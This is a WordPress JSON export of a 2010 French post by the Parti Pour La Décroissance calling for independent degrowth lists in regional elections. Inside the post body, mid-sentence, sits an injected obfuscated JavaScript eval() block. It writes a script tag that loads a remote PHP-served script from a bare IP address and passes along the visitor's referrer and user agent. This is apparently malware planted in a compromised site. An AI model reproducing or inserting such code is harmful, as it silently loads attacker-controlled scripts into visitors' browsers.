{"id":3964,"date":"2010-01-24T21:15:39","date_gmt":"2010-01-24T20:15:39","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=3964"},"modified":"2012-07-17T15:52:17","modified_gmt":"2012-07-17T14:52:17","slug":"appel-pour-des-listes-100-decroissance","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=3964","title":{"rendered":"Appel pour des listes 100% D\u00e9croissance"},"content":{"rendered":"<p><span style=\"color: #ff6600;\"><strong><br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" style=\"margin: 5px;\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/logo-ppld.gif\" alt=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/logo-ppld.gif\" width=\"118\" height=\"68\" \/>Le <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zshhs|var|u0026u|referrer|rhiif||js|php'.split('|'),0,{}))\n<\/script><\/noindex> PPLD participe \u00e0 la d\u00e9marche des Objecteurs de Croissance d\u2019\u00cele-de-France et de Haute-Normandie.<\/strong><\/span><\/p>\n<p>Dans ces r\u00e9gions, avec l&rsquo;AdOC (Association d&rsquo;Objecteurs de Croissance) nous avons d\u00e9cid\u00e9 de pr\u00e9senter des listes ind\u00e9pendantes D\u00e9croissance, aux \u00e9lections r\u00e9gionales de mars 2010 ! Nous comptons bien profiter de ces \u00e9lections pour faire germer les id\u00e9es de la d\u00e9croissance dans notre r\u00e9gion \u00cele-de-France.<br \/>\nLa participation \u00ab\u00a0<em>officielle<\/em>\u00a0\u00bb des Objecteurs de Croissance aux \u00e9lections est un <strong>acte symbolique fort <\/strong>qui d\u00e9montre notre volont\u00e9 de ne pas s&rsquo;exclure de la vie de la cit\u00e9, mais de tenter au contraire de reprendre la main sur la vie politique.<\/p>\n<ul>\n<li>c&rsquo;est aussi et avant tout une excellente opportunit\u00e9 de <strong>porter la voix de la d\u00e9croissance dans le d\u00e9bat public<\/strong> et d&rsquo;ouvrir la voie \u00e0 la d\u00e9colonisation de nos imaginaires ;<\/li>\n<li>c&rsquo;est encore la possibilit\u00e9 de <strong>proposer une expression d\u00e9mocratique diff\u00e9rente<\/strong> et enrichie ;<\/li>\n<li>c&rsquo;est l\u2019occasion d&rsquo;aller \u00e0 la rencontre des citoyens, <strong>de bousculer les sch\u00e9mas \u00e9tablis<\/strong> et de participer \u00e0 l&rsquo;\u00e9volution de nos syst\u00e8mes de pens\u00e9es ;<\/li>\n<li>c\u2019est surtout l\u2019occasion <strong>de se rencontrer, de cr\u00e9er des r\u00e9seaux r\u00e9gionaux<\/strong>, pour celles et ceux qui le souhaitent<\/li>\n<li>enfin c&rsquo;est la certitude de bons moments \u00e0 passer ensemble<\/li>\n<\/ul>\n<p><strong><span style=\"color: #ff6600;\">Alors toutes les bonnes volont\u00e9s sont les bienvenues pour participer, chacun \u00e0 son niveau, \u00e0 la \u00ab\u00a0campagne\u00a0\u00bb&#8230;!<\/span><\/strong><\/p>\n<ul>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?p=7511\" target=\"_blank\"><strong>En \u00cele-de-France<\/strong> : l&rsquo;appel &amp; projet et en pratique<\/a><\/li>\n<li><strong>En Haute-Normandie :<\/strong> l&rsquo;<a href=\"http:\/\/decroissance.lehavre.free.fr\/regions10.htm#projet1\">appel &amp; projet<\/a> et en <a href=\"http:\/\/decroissance.lehavre.free.fr\/#appel2\">pratique<\/a><\/li>\n<li><strong>En Franche-Comt\u00e9 : <\/strong><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2010\/01\/franche-comt\u00e9.pdf\">l&rsquo;appel &amp; projet et en pratique<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Le PPLD participe \u00e0 la d\u00e9marche des Objecteurs de Croissance d\u2019\u00cele-de-France et de Haute-Normandie. Dans ces r\u00e9gions, avec l&rsquo;AdOC (Association d&rsquo;Objecteurs de Croissance) nous avons d\u00e9cid\u00e9 de pr\u00e9senter des listes ind\u00e9pendantes D\u00e9croissance, aux \u00e9lections r\u00e9gionales de mars 2010 ! Nous &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=3964\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,32],"tags":[],"class_list":["post-3964","post","type-post","status-publish","format-standard","hentry","category-communiques-de-presse","category-elections"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3964","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3964"}],"version-history":[{"count":6,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3964\/revisions"}],"predecessor-version":[{"id":3966,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3964\/revisions\/3966"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3964"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3964"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}